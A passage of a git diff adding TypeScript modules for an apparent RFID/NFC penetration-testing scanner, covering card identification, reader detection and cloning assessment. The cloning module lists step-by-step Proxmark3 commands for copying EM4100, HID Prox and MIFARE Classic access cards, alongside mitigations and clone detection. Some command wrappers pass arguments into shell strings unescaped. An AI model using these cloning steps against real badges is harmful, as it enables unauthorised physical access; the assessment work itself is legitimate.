+    let cloneableCount = 0
+
+    for (const tag of tags) {
+      const info = getCardInfo(tag.type)
+
+      byType[tag.type] = (byType[tag.type] || 0) + 1
+      byFrequency[tag.frequency] = (byFrequency[tag.frequency] || 0) + 1
+      bySecurityLevel[info.securityLevel] =
+        (bySecurityLevel[info.securityLevel] || 0) + 1
+
+      if (info.cloneable) cloneableCount++
+    }
+
+    return {
+      total: tags.length,
+      byType,
+      byFrequency,
+      bySecurityLevel,
+      cloneableCount,
+    }
+  }
+
+  // ========== Format Functions ==========
+
+  /**
+   * Format card information for display.
+   */
+  export function formatCardInfo(tag: WirelessScanTypes.RFIDTag): string {
+    const info = getCardInfo(tag.type)
+    const lines: string[] = []
+
+    lines.push(`Card Type: ${info.name}`)
+    lines.push(`UID: ${tag.uid}`)
+    lines.push(`Frequency: ${info.frequency}`)
+    lines.push(`Protocol: ${info.protocol}`)
+    lines.push(`Manufacturer: ${info.manufacturer}`)
+    lines.push(`Memory: ${info.memory}`)
+    lines.push(`Encryption: ${info.encryption}`)
+    lines.push(`Security Level: ${info.securityLevel}`)
+    lines.push(`Cloneable: ${info.cloneable ? "Yes" : "No"}`)
+
+    if (tag.atqa) lines.push(`ATQA: ${tag.atqa}`)
+    if (tag.sak) lines.push(`SAK: ${tag.sak}`)
+
+    if (info.commonUses.length > 0) {
+      lines.push(`Common Uses: ${info.commonUses.join(", ")}`)
+    }
+
+    return lines.join("\n")
+  }
+
+  /**
+   * Format security assessment for display.
+   */
+  export function formatSecurityAssessment(
+    assessment: CardSecurityAssessment
+  ): string {
+    const lines: string[] = []
+
+    lines.push(`Security Level: ${assessment.securityLevel.toUpperCase()}`)
+    lines.push(`Cloneable: ${assessment.cloneable ? "Yes" : "No"}`)
+    lines.push(
+      `Key Recovery: ${assessment.keyRecoveryPossible ? "Possible" : "Not easily possible"}`
+    )
+
+    if (assessment.vulnerabilities.length > 0) {
+      lines.push("")
+      lines.push("Vulnerabilities:")
+      for (const vuln of assessment.vulnerabilities) {
+        lines.push(`  - ${vuln}`)
+      }
+    }
+
+    if (assessment.recommendations.length > 0) {
+      lines.push("")
+      lines.push("Recommendations:")
+      for (const rec of assessment.recommendations) {
+        lines.push(`  - ${rec}`)
+      }
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/wirelessscan/rfid/cloning.ts b/packages/opencode/src/pentest/wirelessscan/rfid/cloning.ts
new file mode 100644
index 00000000000..95cea9e7b13
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/rfid/cloning.ts
@@ -0,0 +1,422 @@
+/**
+ * @fileoverview RFID Cloning Vulnerability Detection
+ *
+ * Detection of RFID cards vulnerable to cloning attacks.
+ *
+ * @module pentest/wirelessscan/rfid/cloning
+ */
+
+import { WirelessScanTypes } from "../types"
+import { WirelessScanStorage } from "../storage"
+import { RFIDCards } from "./cards"
+
+/**
+ * RFID cloning namespace.
+ */
+export namespace RFIDCloning {
+  // ========== Cloning Assessment ==========
+
+  /**
+   * Cloning assessment result.
+   */
+  export interface CloningAssessment {
+    cloneable: boolean
+    difficulty: "trivial" | "easy" | "moderate" | "difficult" | "not_possible"
+    requiredEquipment: string[]
+    requiredTime: string
+    steps: string[]
+    mitigations: string[]
+  }
+
+  /**
+   * Assess cloning vulnerability for a tag.
+   */
+  export function assessCloningVulnerability(
+    tag: WirelessScanTypes.RFIDTag
+  ): CloningAssessment {
+    const cardInfo = RFIDCards.getCardInfo(tag.type)
+
+    // Define assessments by card type
+    const assessments: Record<string, () => CloningAssessment> = {
+      em4100: () => ({
+        cloneable: true,
+        difficulty: "trivial",
+        requiredEquipment: ["Proxmark3 or T5577 writer", "T5577 blank card"],
+        requiredTime: "< 1 minute",
+        steps: [
+          "Read original card UID with Proxmark3 (lf em 410x reader)",
+          "Write UID to T5577 blank (lf em 410x clone --id <UID>)",
+          "Verify clone reads correctly",
+        ],
+        mitigations: [
+          "Upgrade to encrypted card technology",
+          "Implement multi-factor authentication",
+          "Use card + PIN verification",
+        ],
+      }),
+
+      "hid-prox": () => ({
+        cloneable: true,
+        difficulty: "easy",
+        requiredEquipment: ["Proxmark3", "T5577 blank card"],
+        requiredTime: "1-2 minutes",
+        steps: [
+          "Read original card (lf hid read)",
+          "Note Facility Code and Card Number",
+          "Clone to T5577 (lf hid clone --fc <FC> --cn <CN>)",
+          "Verify clone functions correctly",
+        ],
+        mitigations: [
+          "Upgrade to HID iCLASS SE or SEOS",
+          "Implement credential monitoring",
+          "Use mobile credentials",
+        ],
+      }),
+
+      "mifare-classic-1k": () => ({
+        cloneable: true,
+        difficulty: "easy",
+        requiredEquipment: ["Proxmark3 or ACR122U", "Magic MIFARE card (UID writable)"],
+        requiredTime: "5-30 minutes (depending on key recovery)",
+        steps: [
+          "Identify card (hf search)",
+          "Attempt known keys (hf mf chk)",
+          "If needed, run nested attack (hf mf nested) or hardnested",
+          "Dump card data (hf mf dump)",
+          "Write to magic card (hf mf cload)",
+        ],
+        mitigations: [
+          "Migrate to MIFARE DESFire EV2/EV3",
+          "Use diversified keys",
+          "Implement backend validation",
+          "Enable rolling codes if supported",
+        ],
+      }),
+
+      "mifare-classic-4k": () => ({
+        cloneable: true,
+        difficulty: "easy",
+        requiredEquipment: ["Proxmark3 or ACR122U", "Magic MIFARE 4K card"],
+        requiredTime: "10-45 minutes",
+        steps: [
+          "Same as Classic 1K but with more sectors",
+          "May require multiple key recovery attempts",
+        ],
+        mitigations: [
+          "Same as Classic 1K",
+          "Consider MIFARE Plus in SL3 mode",
+        ],
+      }),
+
+      "mifare-ultralight": () => ({
+        cloneable: true,
+        difficulty: "trivial",
+        requiredEquipment: ["Any NFC reader", "NTAG or Ultralight blank"],
+        requiredTime: "< 1 minute",
+        steps: [
+          "Read all pages (hf mfu dump)",
+          "Write to blank (hf mfu restore)",
+          "Note: UID cannot be cloned without magic card",
+        ],
+        mitigations: [
+          "Use Ultralight C with 3DES authentication",
+          "Enable OTP (one-time programmable) bits",
+          "Backend UID validation",
+        ],
+      }),
+
+      ntag215: () => ({
+        cloneable: true,
+        difficulty: "easy",
+        requiredEquipment: ["NFC reader", "NTAG215 blank or Magic NTAG"],
+        requiredTime: "1-5 minutes",
+        steps: [
+          "Read all pages including password",
+          "If password protected, may need to crack 32-bit password",
+          "Write to blank NTAG215",
+        ],
+        mitigations: [
+          "Enable password protection",
+          "Use signature verification",
+          "Implement backend validation",
+        ],
+      }),
+
+      "mifare-desfire": () => ({
+        cloneable: false,
+        difficulty: "not_possible",
+        requiredEquipment: [],
+        requiredTime: "N/A",
+        steps: [
+          "DESFire uses strong encryption (DES/3DES/AES)",
+          "No known practical attacks for properly configured cards",
+          "Would require key extraction from legitimate reader",
+        ],
+        mitigations: [
+          "Keep firmware updated",
+          "Use AES keys (EV1+)",
+          "Implement proper key diversification",
+        ],
+      }),
+
+      t5577: () => ({
+        cloneable: true,
+        difficulty: "trivial",
+        requiredEquipment: ["Proxmark3", "Another T5577 blank"],
+        requiredTime: "< 1 minute",
+        steps: [
+          "Read T5577 configuration (lf t55xx detect)",
+          "Dump all blocks (lf t55xx dump)",
+          "Write to new blank",
+        ],
+        mitigations: [
+          "Enable password protection",
+          "Use as cloning target only, not primary credential",
+        ],
+      }),
+
+      "hid-iclass": () => ({
+        cloneable: false,
+        difficulty: "difficult",
+        requiredEquipment: ["Specialized equipment", "Master key access"],
+        requiredTime: "Varies - may not be possible",
+        steps: [
+          "Legacy iCLASS may be vulnerable if using default keys",
+          "iCLASS SE/SEOS are significantly more secure",
+          "Would require reader compromise or master keys",
+        ],
+        mitigations: [
+          "Use iCLASS SE or SEOS",
+          "Enable elite keys",
+          "Credential monitoring",
+        ],
+      }),
+    }
+
+    const assessFn = assessments[tag.type]
+    if (assessFn) {
+      return assessFn()
+    }
+
+    // Default assessment for unknown types
+    return {
+      cloneable: cardInfo.cloneable,
+      difficulty: cardInfo.cloneable ? "moderate" : "not_possible",
+      requiredEquipment: cardInfo.cloneable ? ["Appropriate reader/writer"] : [],
+      requiredTime: "Unknown",
+      steps: ["Specific cloning procedure unknown for this card type"],
+      mitigations: ["Consult manufacturer documentation"],
+    }
+  }
+
+  // ========== Finding Generation ==========
+
+  /**
+   * Create cloning vulnerability findings.
+   */
+  export function createCloningFindings(
+    tags: WirelessScanTypes.RFIDTag[],
+    scanId: string
+  ): WirelessScanTypes.WirelessFinding[] {
+    const findings: WirelessScanTypes.WirelessFinding[] = []
+
+    for (const tag of tags) {
+      const assessment = assessCloningVulnerability(tag)
+
+      if (!assessment.cloneable) continue
+
+      const severity = getDifficultySeverity(assessment.difficulty)
+
+      findings.push({
+        id: WirelessScanStorage.createFindingId(),
+        scanId,
+        wirelessType: "rfid",
+        category: "vulnerability",
+        severity,
+        title: `Cloneable RFID Card: ${tag.type}`,
+        description: getCloningDescription(tag, assessment),
+        target: {
+          type: "tag",
+          identifier: tag.uid,
+          name: tag.type,
+        },
+        vulnerability: "RFID Card Cloning",
+        recommendation: assessment.mitigations.join(". "),
+        references: [
+          "https://www.proxmark.com/",
+          "https://github.com/RfidResearchGroup/proxmark3",
+        ],
+        evidence: `Difficulty: ${assessment.difficulty}, Time: ${assessment.requiredTime}`,
+        falsePositive: false,
+        verified: false,
+        detectedAt: Date.now(),
+      })
+    }
+
+    return findings
+  }
+
+  /**
+   * Get severity based on cloning difficulty.
+   */
+  function getDifficultySeverity(
+    difficulty: CloningAssessment["difficulty"]
+  ): WirelessScanTypes.Severity {
+    switch (difficulty) {
+      case "trivial":
+        return "critical"
+      case "easy":
+        return "high"
+      case "moderate":
+        return "medium"
+      case "difficult":
+        return "low"
+      case "not_possible":
+        return "info"
+    }
+  }
+
+  /**
+   * Get cloning description.
+   */
+  function getCloningDescription(
+    tag: WirelessScanTypes.RFIDTag,
+    assessment: CloningAssessment
+  ): string {
+    const cardInfo = RFIDCards.getCardInfo(tag.type)
+
+    return `The ${cardInfo.name} card (UID: ${tag.uid}) is vulnerable to cloning. ` +
+      `Cloning difficulty is ${assessment.difficulty} and can be accomplished in ${assessment.requiredTime} ` +
+      `using ${assessment.requiredEquipment.join(" and ")}. ` +
+      `This card type uses ${cardInfo.encryption} which ${
+        cardInfo.securityLevel === "none" || cardInfo.securityLevel === "low"
+          ? "provides inadequate protection against cloning attacks"
+          : "may have known weaknesses"
+      }.`
+  }
+
+  // ========== Clone Detection ==========
+
+  /**
+   * Check for potential cloned cards (heuristics).
+   */
+  export function detectPotentialClones(
+    tags: WirelessScanTypes.RFIDTag[]
+  ): {
+    suspicious: WirelessScanTypes.RFIDTag[]
+    reasons: Map<string, string[]>
+  } {
+    const suspicious: WirelessScanTypes.RFIDTag[] = []
+    const reasons = new Map<string, string[]>()
+
+    // Check for duplicate UIDs (should never happen)
+    const uidCounts = new Map<string, number>()
+    for (const tag of tags) {
+      uidCounts.set(tag.uid, (uidCounts.get(tag.uid) || 0) + 1)
+    }
+
+    for (const tag of tags) {
+      const tagReasons: string[] = []
+
+      // Check for duplicate UID
+      if ((uidCounts.get(tag.uid) || 0) > 1) {
+        tagReasons.push("Duplicate UID detected - possible clone")
+      }
+
+      // Check for magic card indicators
+      if (isMagicCardUID(tag.uid, tag.type)) {
+        tagReasons.push("UID pattern matches known magic card")
+      }
+
+      // Check for T5577 emulating other card types
+      if (tag.type === "t5577") {
+        tagReasons.push("T5577 programmable card - commonly used for cloning")
+      }
+
+      // Check for Chinese magic MIFARE indicators
+      if (tag.type.includes("mifare") && hasBlockZeroWritable(tag)) {
+        tagReasons.push("Block 0 appears writable - magic MIFARE card")
+      }
+
+      if (tagReasons.length > 0) {
+        suspicious.push(tag)
+        reasons.set(tag.uid, tagReasons)
+      }
+    }
+
+    return { suspicious, reasons }
+  }
+
+  /**
+   * Check if UID matches known magic card patterns.
+   */
+  function isMagicCardUID(uid: string, type: WirelessScanTypes.RFIDTagType): boolean {
+    // Some magic cards have recognizable UID patterns
+    const magicPatterns = [
+      /^01020304/, // Common default
+      /^DEADBEEF/, // Developer pattern
+      /^00000000/, // All zeros
+      /^FFFFFFFF/, // All ones
+    ]
+
+    if (type.includes("mifare")) {
+      return magicPatterns.some((p) => p.test(uid))
+    }
+
+    return false
+  }
+
+  /**
+   * Check if block 0 is writable (magic card indicator).
+   */
+  function hasBlockZeroWritable(tag: WirelessScanTypes.RFIDTag): boolean {
+    // This would require active testing
+    // For now, return false as we can't determine this passively
+    return false
+  }
+
+  // ========== Format Functions ==========
+
+  /**
+   * Format cloning assessment for display.
+   */
+  export function formatCloningAssessment(
+    tag: WirelessScanTypes.RFIDTag
+  ): string {
+    const assessment = assessCloningVulnerability(tag)
+    const lines: string[] = []
+
+    lines.push(`Cloning Assessment for ${tag.type} (${tag.uid})`)
+    lines.push("=".repeat(50))
+    lines.push("")
+    lines.push(`Cloneable: ${assessment.cloneable ? "YES" : "NO"}`)
+    lines.push(`Difficulty: ${assessment.difficulty}`)
+    lines.push(`Estimated Time: ${assessment.requiredTime}`)
+    lines.push("")
+
+    if (assessment.requiredEquipment.length > 0) {
+      lines.push("Required Equipment:")
+      for (const equip of assessment.requiredEquipment) {
+        lines.push(`  - ${equip}`)
+      }
+      lines.push("")
+    }
+
+    if (assessment.steps.length > 0) {
+      lines.push("Cloning Steps:")
+      assessment.steps.forEach((step, i) => {
+        lines.push(`  ${i + 1}. ${step}`)
+      })
+      lines.push("")
+    }
+
+    if (assessment.mitigations.length > 0) {
+      lines.push("Mitigations:")
+      for (const mitigation of assessment.mitigations) {
+        lines.push(`  - ${mitigation}`)
+      }
+    }
+
+    return lines.join("\n")
+  }
+}
diff --git a/packages/opencode/src/pentest/wirelessscan/rfid/discovery.ts b/packages/opencode/src/pentest/wirelessscan/rfid/discovery.ts
new file mode 100644
index 00000000000..e9996e20670
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/rfid/discovery.ts
@@ -0,0 +1,484 @@
+/**
+ * @fileoverview RFID/NFC Tag Discovery
+ *
+ * Functions for discovering RFID/NFC tags and readers.
+ *
+ * @module pentest/wirelessscan/rfid/discovery
+ */
+
+import { WirelessScanTypes } from "../types"
+import { WirelessScanStorage } from "../storage"
+import { Bus } from "../../../bus"
+import { WirelessScanEvents } from "../events"
+import { Log } from "../../../util/log"
+
+const log = Log.create({ service: "wirelessscan.rfid.discovery" })
+
+/**
+ * RFID discovery namespace.
+ */
+export namespace RFIDDiscovery {
+  // ========== Reader Detection ==========
+
+  /**
+   * Detect connected RFID readers.
+   */
+  export async function detectReaders(
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<WirelessScanTypes.RFIDReader[]> {
+    const readers: WirelessScanTypes.RFIDReader[] = []
+
+    // Check for Proxmark3
+    const pm3Result = await execCommand(
+      'ls /dev/ttyACM* 2>/dev/null && proxmark3 --list 2>/dev/null || echo ""'
+    )
+    if (pm3Result.stdout.includes("/dev/ttyACM")) {
+      readers.push(...detectProxmark3(pm3Result.stdout))
+    }
+
+    // Check for ACR122U via pcsc
+    const pcscResult = await execCommand(
+      'pcsc_scan -r 2>/dev/null || echo ""'
+    )
+    if (pcscResult.stdout) {
+      readers.push(...detectPCSCReaders(pcscResult.stdout))
+    }
+
+    // Check for libnfc supported readers
+    const nfcResult = await execCommand(
+      'nfc-list 2>/dev/null || echo ""'
+    )
+    if (nfcResult.stdout) {
+      readers.push(...detectNFCReaders(nfcResult.stdout))
+    }
+
+    // Check for Chameleon Mini/Tiny
+    const chameleonResult = await execCommand(
+      'ls /dev/ttyUSB* 2>/dev/null || echo ""'
+    )
+    if (chameleonResult.stdout.includes("/dev/ttyUSB")) {
+      readers.push(...detectChameleon(chameleonResult.stdout))
+    }
+
+    return readers
+  }
+
+  /**
+   * Detect Proxmark3 devices.
+   */
+  function detectProxmark3(output: string): WirelessScanTypes.RFIDReader[] {
+    const readers: WirelessScanTypes.RFIDReader[] = []
+    const portMatch = output.match(/\/dev\/ttyACM\d+/g)
+
+    if (portMatch) {
+      for (const port of portMatch) {
+        readers.push({
+          id: WirelessScanStorage.createTagId(),
+          name: "Proxmark3",
+          type: "proxmark3",
+          port,
+          connected: true,
+          capabilities: ["lf", "hf", "iso14443a", "iso14443b", "iso15693", "em4x", "hid"],
+        })
+      }
+    }
+
+    return readers
+  }
+
+  /**
+   * Detect PC/SC compatible readers.
+   */
+  function detectPCSCReaders(output: string): WirelessScanTypes.RFIDReader[] {
+    const readers: WirelessScanTypes.RFIDReader[] = []
+    const lines = output.split("\n")
+
+    for (const line of lines) {
+      if (line.includes("ACR122")) {
+        readers.push({
+          id: WirelessScanStorage.createTagId(),
+          name: "ACR122U",
+          type: "acr122u",
+          connected: true,
+          capabilities: ["hf", "iso14443a", "iso14443b", "felica"],
+        })
+      } else if (line.includes("PN532") || line.includes("pn532")) {
+        readers.push({
+          id: WirelessScanStorage.createTagId(),
+          name: "PN532",
+          type: "pn532",
+          connected: true,
+          capabilities: ["hf", "iso14443a", "iso14443b", "felica"],
+        })
+      }
+    }
+
+    return readers
+  }
+
+  /**
+   * Detect libnfc compatible readers.
+   */
+  function detectNFCReaders(output: string): WirelessScanTypes.RFIDReader[] {
+    const readers: WirelessScanTypes.RFIDReader[] = []
+
+    if (output.includes("NFC device")) {
+      const nameMatch = output.match(/NFC device:\s*(.+?)(?:\s+opened|\n)/i)
+      if (nameMatch) {
+        const name = nameMatch[1].trim()
+        let type: WirelessScanTypes.RFIDReader["type"] = "other"
+
+        if (name.includes("ACR122")) type = "acr122u"
+        else if (name.includes("PN532") || name.includes("pn532")) type = "pn532"
+        else if (name.includes("Proxmark")) type = "proxmark3"
+
+        readers.push({
+          id: WirelessScanStorage.createTagId(),
+          name,
+          type,
+          connected: true,
+          capabilities: ["hf", "iso14443a"],
+        })
+      }
+    }
+
+    return readers
+  }
+
+  /**
+   * Detect Chameleon devices.
+   */
+  function detectChameleon(output: string): WirelessScanTypes.RFIDReader[] {
+    const readers: WirelessScanTypes.RFIDReader[] = []
+    const portMatch = output.match(/\/dev\/ttyUSB\d+/g)
+
+    if (portMatch) {
+      // We can't definitively identify Chameleon without probing
+      // This is a heuristic based on common USB serial devices
+      for (const port of portMatch) {
+        readers.push({
+          id: WirelessScanStorage.createTagId(),
+          name: "Possible Chameleon",
+          type: "chameleon",
+          port,
+          connected: true,
+          capabilities: ["hf", "iso14443a"],
+        })
+      }
+    }
+
+    return readers
+  }
+
+  // ========== Tag Discovery ==========
+
+  /**
+   * Scan for RFID/NFC tags.
+   */
+  export async function scanTags(
+    reader: WirelessScanTypes.RFIDReader,
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<WirelessScanTypes.RFIDTag[]> {
+    const tags: WirelessScanTypes.RFIDTag[] = []
+
+    switch (reader.type) {
+      case "proxmark3":
+        tags.push(...(await scanWithProxmark3(reader, execCommand)))
+        break
+      case "acr122u":
+      case "pn532":
+        tags.push(...(await scanWithLibnfc(execCommand)))
+        break
+      default:
+        log.warn("Unknown reader type, trying libnfc", { type: reader.type })
+        tags.push(...(await scanWithLibnfc(execCommand)))
+    }
+
+    // Emit events for discovered tags
+    for (const tag of tags) {
+      Bus.publish(WirelessScanEvents.RFIDTagFound, {
+        scanId: "",
+        uid: tag.uid,
+        type: tag.type,
+        frequency: tag.frequency,
+        protocol: tag.protocol,
+      })
+    }
+
+    return tags
+  }
+
+  /**
+   * Scan with Proxmark3.
+   */
+  async function scanWithProxmark3(
+    reader: WirelessScanTypes.RFIDReader,
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<WirelessScanTypes.RFIDTag[]> {
+    const tags: WirelessScanTypes.RFIDTag[] = []
+    const port = reader.port ? `-p ${reader.port}` : ""
+
+    // Scan HF (13.56 MHz)
+    const hfResult = await execCommand(
+      `proxmark3 ${port} -c "hf search" 2>&1 || true`
+    )
+    if (hfResult.stdout) {
+      const hfTags = parseProxmark3HFOutput(hfResult.stdout)
+      tags.push(...hfTags)
+    }
+
+    // Scan LF (125 kHz)
+    const lfResult = await execCommand(
+      `proxmark3 ${port} -c "lf search" 2>&1 || true`
+    )
+    if (lfResult.stdout) {
+      const lfTags = parseProxmark3LFOutput(lfResult.stdout)
+      tags.push(...lfTags)
+    }
+
+    return tags
+  }
+
+  /**
+   * Parse Proxmark3 HF output.
+   */
+  function parseProxmark3HFOutput(output: string): WirelessScanTypes.RFIDTag[] {
+    const tags: WirelessScanTypes.RFIDTag[] = []
+
+    // MIFARE Classic
+    const mifareMatch = output.match(/UID\s*:\s*([0-9A-Fa-f\s]+)/i)
+    const atqaMatch = output.match(/ATQA\s*:\s*([0-9A-Fa-f\s]+)/i)
+    const sakMatch = output.match(/SAK\s*:\s*([0-9A-Fa-f]+)/i)
+
+    if (mifareMatch) {
+      const uid = mifareMatch[1].replace(/\s/g, "").toUpperCase()
+      const atqa = atqaMatch?.[1].replace(/\s/g, "").toUpperCase()
+      const sak = sakMatch?.[1].toUpperCase()
+
+      const tagType = determineTagType(sak, atqa)
+
+      tags.push({
+        id: WirelessScanStorage.createTagId(),
+        uid,
+        type: tagType,
+        frequency: "13.56mhz",
+        protocol: "iso14443a",
+        atqa,
+        sak,
+        writable: true,
+        locked: false,
+        passwordProtected: false,
+        firstSeen: Date.now(),
+        lastSeen: Date.now(),
+      })
+    }
+
+    // NTAG
+    const ntagMatch = output.match(/NTAG(\d+)/i)
+    if (ntagMatch && mifareMatch) {
+      const uid = mifareMatch[1].replace(/\s/g, "").toUpperCase()
+      const ntagType = `ntag${ntagMatch[1]}` as WirelessScanTypes.RFIDTagType
+
+      tags.push({
+        id: WirelessScanStorage.createTagId(),
+        uid,
+        type: ntagType,
+        frequency: "13.56mhz",
+        protocol: "iso14443a",
+        writable: true,
+        locked: false,
+        passwordProtected: false,
+        firstSeen: Date.now(),
+        lastSeen: Date.now(),
+      })
+    }
+
+    return tags
+  }
+
+  /**
+   * Parse Proxmark3 LF output.
+   */
+  function parseProxmark3LFOutput(output: string): WirelessScanTypes.RFIDTag[] {
+    const tags: WirelessScanTypes.RFIDTag[] = []
+
+    // EM4100/EM4102
+    const emMatch = output.match(/EM\s*4\d+.*?ID[:\s]+([0-9A-Fa-f]+)/i)
+    if (emMatch) {
+      tags.push({
+        id: WirelessScanStorage.createTagId(),
+        uid: emMatch[1].toUpperCase(),
+        type: "em4100",
+        frequency: "125khz",
+        protocol: "em4x",
+        writable: false,
+        locked: true,
+        passwordProtected: false,
+        firstSeen: Date.now(),
+        lastSeen: Date.now(),
+      })
+    }
+
+    // HID Prox
+    const hidMatch = output.match(/HID.*?Prox.*?ID[:\s]+([0-9A-Fa-f]+)/i)
+    if (hidMatch) {
+      tags.push({
+        id: WirelessScanStorage.createTagId(),
+        uid: hidMatch[1].toUpperCase(),
+        type: "hid-prox",
+        frequency: "125khz",
+        protocol: "hid",
+        writable: false,
+        locked: true,
+        passwordProtected: false,
+        firstSeen: Date.now(),
+        lastSeen: Date.now(),
+      })
+    }
+
+    // T5577 (programmable)
+    const t5577Match = output.match(/T55[x7]7/i)
+    if (t5577Match) {
+      const idMatch = output.match(/ID[:\s]+([0-9A-Fa-f]+)/i)
+      tags.push({
+        id: WirelessScanStorage.createTagId(),
+        uid: idMatch?.[1]?.toUpperCase() || "UNKNOWN",
+        type: "t5577",
+        frequency: "125khz",
+        protocol: "em4x",
+        writable: true,
+        locked: false,
+        passwordProtected: false,
+        firstSeen: Date.now(),
+        lastSeen: Date.now(),
+      })
+    }
+
+    return tags
+  }
+
+  /**
+   * Scan with libnfc (nfc-list).
+   */
+  async function scanWithLibnfc(
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<WirelessScanTypes.RFIDTag[]> {
+    const tags: WirelessScanTypes.RFIDTag[] = []
+
+    const result = await execCommand("nfc-list -t 5 2>&1 || true")
+
+    if (!result.stdout) return tags
+
+    // Parse ISO14443A tags
+    const uidMatches = result.stdout.matchAll(
+      /UID.*?:\s*([0-9A-Fa-f\s]+)[\r\n].*?ATQA.*?:\s*([0-9A-Fa-f\s]+)[\r\n].*?SAK.*?:\s*([0-9A-Fa-f]+)/gi
+    )
+
+    for (const match of uidMatches) {
+      const uid = match[1].replace(/\s/g, "").toUpperCase()
+      const atqa = match[2].replace(/\s/g, "").toUpperCase()
+      const sak = match[3].toUpperCase()
+
+      const tagType = determineTagType(sak, atqa)
+
+      tags.push({
+        id: WirelessScanStorage.createTagId(),
+        uid,
+        type: tagType,
+        frequency: "13.56mhz",
+        protocol: "iso14443a",
+        atqa,
+        sak,
+        writable: true,
+        locked: false,
+        passwordProtected: false,
+        firstSeen: Date.now(),
+        lastSeen: Date.now(),
+      })
+    }
+
+    return tags
+  }
+
+  /**
+   * Determine tag type from SAK and ATQA.
+   */
+  function determineTagType(
+    sak?: string,
+    _atqa?: string
+  ): WirelessScanTypes.RFIDTagType {
+    if (!sak) return "unknown"
+
+    const sakNum = parseInt(sak, 16)
+
+    // SAK byte interpretation
+    switch (sakNum) {
+      case 0x08:
+        return "mifare-classic-1k"
+      case 0x09:
+        return "mifare-classic-1k" // Mini
+      case 0x18:
+        return "mifare-classic-4k"
+      case 0x00:
+        return "mifare-ultralight"
+      case 0x04:
+        return "mifare-ultralight" // Could be NTAG
+      case 0x20:
+        return "mifare-plus"
+      case 0x24:
+        return "mifare-desfire"
+      default:
+        return "unknown"
+    }
+  }
+
+  // ========== Emitting Reader Events ==========
+
+  /**
+   * Emit reader found events.
+   */
+  export function emitReaderEvents(
+    readers: WirelessScanTypes.RFIDReader[],
+    scanId: string
+  ): void {
+    for (const reader of readers) {
+      Bus.publish(WirelessScanEvents.RFIDReaderFound, {
+        scanId,
+        name: reader.name,
+        type: reader.type,
+        port: reader.port,
+        capabilities: reader.capabilities,
+      })
+    }
+  }
+
+  // ========== Convenience Functions ==========
+
+  /**
+   * Check if any RFID readers are available.
+   */
+  export async function hasReader(
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<boolean> {
+    const readers = await detectReaders(execCommand)
+    return readers.length > 0
+  }
+
+  /**
+   * Get the best available reader.
+   */
+  export async function getBestReader(
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<WirelessScanTypes.RFIDReader | null> {
+    const readers = await detectReaders(execCommand)
+
+    if (readers.length === 0) return null
+
+    // Prefer Proxmark3 for most capabilities
+    const pm3 = readers.find((r) => r.type === "proxmark3")
+    if (pm3) return pm3
+
+    // Fall back to any available reader
+    return readers[0]
+  }
+}
diff --git a/packages/opencode/src/pentest/wirelessscan/rfid/index.ts b/packages/opencode/src/pentest/wirelessscan/rfid/index.ts
new file mode 100644
index 00000000000..f0161cbd5b7
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/rfid/index.ts
@@ -0,0 +1,13 @@
+/**
+ * @fileoverview RFID/NFC Module
+ *
+ * Exports RFID/NFC scanning and security analysis functions.
+ *
+ * @module pentest/wirelessscan/rfid
+ */
+
+export { RFIDDiscovery } from "./discovery"
+export { RFIDReaders } from "./readers"
+export { RFIDCards } from "./cards"
+export { RFIDCloning } from "./cloning"
+export { RFIDVulnerabilities } from "./vulnerabilities"
diff --git a/packages/opencode/src/pentest/wirelessscan/rfid/readers.ts b/packages/opencode/src/pentest/wirelessscan/rfid/readers.ts
new file mode 100644
index 00000000000..e106c1b92a2
--- /dev/null
+++ b/packages/opencode/src/pentest/wirelessscan/rfid/readers.ts
@@ -0,0 +1,326 @@
+/**
+ * @fileoverview RFID Reader Management
+ *
+ * Functions for managing and interacting with RFID readers.
+ *
+ * @module pentest/wirelessscan/rfid/readers
+ */
+
+import { WirelessScanTypes } from "../types"
+
+/**
+ * RFID readers namespace.
+ */
+export namespace RFIDReaders {
+  // ========== Reader Commands ==========
+
+  /**
+   * Reader command result.
+   */
+  export interface CommandResult {
+    success: boolean
+    output: string
+    error?: string
+  }
+
+  /**
+   * Execute a Proxmark3 command.
+   */
+  export async function executeProxmark3Command(
+    command: string,
+    port: string | undefined,
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<CommandResult> {
+    const portArg = port ? `-p ${port}` : ""
+    const result = await execCommand(
+      `proxmark3 ${portArg} -c "${command}" 2>&1`
+    )
+
+    return {
+      success: result.exitCode === 0,
+      output: result.stdout,
+      error: result.exitCode !== 0 ? result.stderr : undefined,
+    }
+  }
+
+  /**
+   * Execute an nfc-tools command.
+   */
+  export async function executeNFCCommand(
+    tool: string,
+    args: string,
+    execCommand: (cmd: string) => Promise<{ stdout: string; stderr: string; exitCode: number }>
+  ): Promise<CommandResult> {
+    const result = await execCommand(`${tool} ${args} 2>&1`)
+
+    return {
+      success: result.exitCode === 0,
+      output: result.stdout,
+      error: result.exitCode !== 0 ? result.stderr : undefined,
+    }
+  }
+
+  // ========== Reader Configuration ==========
+
+  /**
+   * Reader configuration.
+   */
+  export interface ReaderConfig {
+    timeout: number
+    retries: number
+    antenna: "internal" | "external"
+  }
+
+  /**
+   * Default reader configuration.
+   */
+  export const DEFAULT_CONFIG: ReaderConfig = {
+    timeout: 5000,
+    retries: 3,
+    antenna: "internal",
+  }
+
+  // ========== Reader Capabilities ==========
+
+  /**
+   * Get reader capabilities.
+   */
+  export function getCapabilities(
+    reader: WirelessScanTypes.RFIDReader
+  ): {
+    supportsLF: boolean
+    supportsHF: boolean
+    supportsISO14443A: boolean
+    supportsISO14443B: boolean
+    supportsISO15693: boolean
+    supportsNFC: boolean
+    supportsMifareClassic: boolean
+    supportsEmulation: boolean
+    supportsSniffing: boolean
+  } {
+    const caps = reader.capabilities || []
+
+    return {
